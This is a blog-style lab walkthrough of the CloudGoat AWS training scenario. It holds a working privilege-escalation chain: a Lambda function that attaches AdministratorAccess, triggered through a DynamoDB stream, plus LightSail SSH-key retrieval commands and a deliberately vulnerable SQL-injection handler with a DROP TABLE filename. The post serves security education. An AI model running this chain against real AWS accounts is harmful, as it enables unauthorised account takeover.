Playing with CloudGoat part 3: using AWS Lambda for privilege escalation and exploring a LightSail service

In this blog post, I’ll go through a scenario in which an attacker finds Joe’s and Bob’s access keys but the EC2 instance is terminated. If you’re new to this series and you haven’t the faintest idea what CloudGoat is or who the hell Joe and Bob are, then I recommend reading the first part of the series.

With access keys in hand, the first thing an attacker would do is verify what their owner is allowed to do. Unfortunately, Joe is missing the iam:ListAttachedUserPolicies and iam:GetUserPolicy permissions, but fortunately we can use Bob’s permissions instead.

Oooh, so Joe’s permissions are regulated by the AWS managed policy named DatabaseAdministrator. Being able to create a Lambda function would open a new door in this scenario by giving me new possibilities, but first I have to know which role to assign to it (without a role, a new Lambda wouldn’t be able to perform any actions; makes sense, doesn’t it?). Let’s see which roles are available to assign, using the following command:

$ aws iam list-roles --profile joe

From the output, you can read that there are actually two roles which can be assigned to a Lambda function: “iam_for_lambda” and “lambda-dynamodb-cloudgoat”. The first one uses the policy named “policy_for_lambda_role”, which could be helpful for fooling the CloudTrail service (for more details, see part 2 of this series). So, what about the second role, “lambda-dynamodb-cloudgoat”?
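As a side note, picking the Lambda-assumable roles out of that (often long) listing means checking each role’s trust policy for the lambda.amazonaws.com principal. A minimal sketch of that filter (the dictionary shape mirrors what `list-roles` returns; the helper name is mine):

```python
def assumable_by_lambda(role):
    """Return True if the role's trust policy lets Lambda assume it."""
    statements = role["AssumeRolePolicyDocument"].get("Statement", [])
    for stmt in statements:
        service = stmt.get("Principal", {}).get("Service", "")
        # "Service" may be a single string or a list of service principals
        if isinstance(service, str):
            service = [service]
        if stmt.get("Effect") == "Allow" and "lambda.amazonaws.com" in service:
            return True
    return False
```

Feeding it each entry of the `Roles` array from `aws iam list-roles` leaves only the candidates worth looking at.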

Nice! Having the iam:AttachRolePolicy permission, I can use the Lambda service to escalate privileges to administrator 😎 Such an “evil” function may look as simple as this:

import boto3

def lambda_handler(event, context):
    iam = boto3.client("iam")
    # Attach AdministratorAccess to the role the function runs under...
    iam.attach_role_policy(
        RoleName="lambda-dynamodb-cloudgoat",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",
    )
    # ...and to the user "joe", making him a full administrator
    iam.attach_user_policy(
        UserName="joe",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",
    )

Now it’s time to zip the code, and I’m ready to create a new Lambda function:
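For reference, the zipping step takes only a few lines of Python; the helper below builds the deployment package in memory (the helper name and file name are mine, not from the scenario — Lambda only requires that the archive contain the handler module):

```python
import io
import zipfile

def build_deployment_package(source_code, filename="lambda_function.py"):
    """Zip the Lambda source in memory; Lambda expects a zip archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, source_code)
    return buf.getvalue()
```

Written to disk as function.zip, the archive can then be registered with a command along the lines of `aws lambda create-function --function-name evil_lambda --role <lambda-dynamodb-cloudgoat ARN> --handler lambda_function.lambda_handler --zip-file fileb://function.zip --profile joe` (the exact runtime flag depends on your setup).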

The last step is to simply invoke the function and go celebrating, but… ehhh… that would be too simple. The DatabaseAdministrator policy allows creating new Lambda functions but, unfortunately… not invoking them 😢

But the good news is that a Lambda can also be invoked by an event*.

* — I’ll allow myself a little digression here, as this is a fairly new attack vector applicable to all serverless functions: event injection. Lambda functions often process events, so if you can malform an event (e.g. the name of an uploaded S3 object) and it isn’t properly validated, then you can force the Lambda to execute your code. I don’t want to go into the details now, as this isn’t applicable to the CloudGoat scenarios, but if you’re new to this type of attack, I recommend checking out this short presentation, taking a look at this simple example of SQL injection using an uploaded filename, or just watching this more “real-world” example.
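To make the digression concrete, here’s a deliberately vulnerable sketch of the filename-to-SQL pattern mentioned above (purely illustrative, not part of CloudGoat): the uploaded object’s key is attacker-controlled, so concatenating it into a query lets a crafted filename inject SQL.

```python
def build_insert_query(s3_event):
    """UNSAFE: concatenates the attacker-controlled S3 object key into SQL."""
    # The key is whatever name the attacker gave the uploaded file
    key = s3_event["Records"][0]["s3"]["object"]["key"]
    return "INSERT INTO uploads (name) VALUES ('%s');" % key
```

A file named `x'); DROP TABLE uploads;--` turns that single INSERT into two statements. Parameterized queries, plus validating event fields, close this hole.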

Ok, back to our scenario. Here is the list of all Lambda-supported event sources. Analyzing Joe’s permissions, it seems there’s a chance to connect a new Lambda function with a DynamoDB table — in other words, I can configure a new Lambda function which will be invoked once a new entry appears in a new DynamoDB table. It may sound weird, but take a look at the example. Let’s try to create a simple table named “rzepsky_table” with a stream enabled, using the following command:

$ aws dynamodb create-table --table-name rzepsky_table --attribute-definitions AttributeName=Test,AttributeType=S --key-schema AttributeName=Test,KeyType=HASH --provisioned-throughput ReadCapacityUnits=3,WriteCapacityUnits=3 --stream-specification StreamEnabled=true,StreamViewType=NEW_IMAGE --query TableDescription.LatestStreamArn --profile joe

In short, the above command creates a new table with just one column, Test, for storing strings (S). In --key-schema I specified the primary key for the table (Test). Then I set the provisioned throughput using the --provisioned-throughput parameter and enabled a DynamoDB stream. And… surprise, surprise… it worked 🤓
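For context, once the stream is wired to a function, each new item reaches the Lambda wrapped in a DynamoDB Streams record. A trimmed sketch of that shape (fields abbreviated; helper name is mine) and how the new item could be pulled out:

```python
def new_items(stream_event):
    """Extract NEW_IMAGE payloads from INSERT records in a Streams event."""
    items = []
    for record in stream_event.get("Records", []):
        # StreamViewType=NEW_IMAGE means INSERTs carry the full new item
        if record.get("eventName") == "INSERT":
            items.append(record["dynamodb"]["NewImage"])
    return items
```

In our “evil” function the payload itself is irrelevant — the invocation alone does the damage — but this is what the handler’s event argument looks like.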

Once I’ve created a source of events, it’s time to connect the newly created DynamoDB table with the new Lambda:
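Without the screenshot, the wiring step boils down to creating an event source mapping between the stream and the function. A hedged boto3 sketch (the client is passed in so the logic is easy to test; the function name and stream ARN are placeholders):

```python
def connect_stream_to_lambda(lambda_client, function_name, stream_arn):
    """Create an event source mapping so new stream records invoke the function."""
    return lambda_client.create_event_source_mapping(
        FunctionName=function_name,
        EventSourceArn=stream_arn,
        StartingPosition="LATEST",  # only react to records added from now on
        Enabled=True,
    )
```

In a real run, `lambda_client` would be `boto3.client("lambda")` built from Joe’s profile; the equivalent CLI call is `aws lambda create-event-source-mapping` with the stream ARN returned by the create-table command above.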

Uff… and it also worked! Finally, let’s put a new entry into the table to trigger the Lambda function, using the following command:

$ aws dynamodb put-item --table-name rzepsky_table --item '{"Test": {"S": "Rzepsky"}}' --profile joe

If everything went well, this event should have invoked the Lambda, which in turn attaches the AdministratorAccess policy to the user Joe. So let’s verify the policies attached to Joe:
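The check itself can also be scripted; a small helper along these lines (the client is injected for testability — in practice it would be `boto3.client("iam")` under Joe’s profile, or simply `aws iam list-attached-user-policies --user-name joe --profile joe`):

```python
ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"

def has_admin_policy(iam_client, user_name):
    """Return True if AdministratorAccess is attached to the given user."""
    response = iam_client.list_attached_user_policies(UserName=user_name)
    return any(policy["PolicyArn"] == ADMIN_POLICY_ARN
               for policy in response["AttachedPolicies"])
```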

Hell yeah! The user Joe became an administrator, which actually means he can now perform any action 💪

AWS LightSail

The LightSail service offers cloud compute, storage and networking for cloud users. In other words, you can quickly spin up a virtual server from a variety of operating system, application and stack templates. The goal of LightSail is to provide a simplified version of EC2, so you don’t have to navigate through EBS, VPC, and Route 53 specifics; you just get a simple, lightweight VPS. But… does this simplicity come with less security? Well… let’s check it!

With an EC2 instance, there’s no way to download the SSH key to get the instance’s shell. However, in LightSail the situation looks different. First of all, LightSail users can use a “default key”, which can be retrieved using the following command:

$ aws lightsail download-default-key-pair

Let’s see what keys are used in CloudGoat’s LightSail project:

$ aws lightsail get-instance --instance-name cloudgoat_ls --profile joe

From the output you can read that the LightSail instance uses “cloudgoat_key_pair”:

However, that’s no problem in LightSail, as you can simply ask for temporary SSH keys using the following command:

$ aws lightsail get-instance-access-details --instance-name cloudgoat_ls --profile joe

What’s more, if you have management console access (which isn’t much of a challenge once I’ve escalated Joe’s privileges to administrator), you can even access the shell from your browser! Just click the little terminal icon:

Ending words

In this episode you saw that, using the Amazon-provided DatabaseAdministrator policy, it was possible to escalate privileges when an overly permissive role can be assigned to a Lambda function. Managing IAM permissions is not an easy task, especially if you have a complex architecture and many users. Quite an interesting tool which may help you remove unnecessary permissions is Netflix’s Repokid.

In the second part of this post we explored some “features” of the LightSail service. Don’t get me wrong — I DON’T claim the service is insecure, because you still need proper permissions to access it. Just be aware of such “features” when assigning wildcards in permission policies 😉

Let me know what you think about it! In the next episode I’ll go through more of CloudGoat’s scenarios, sooo: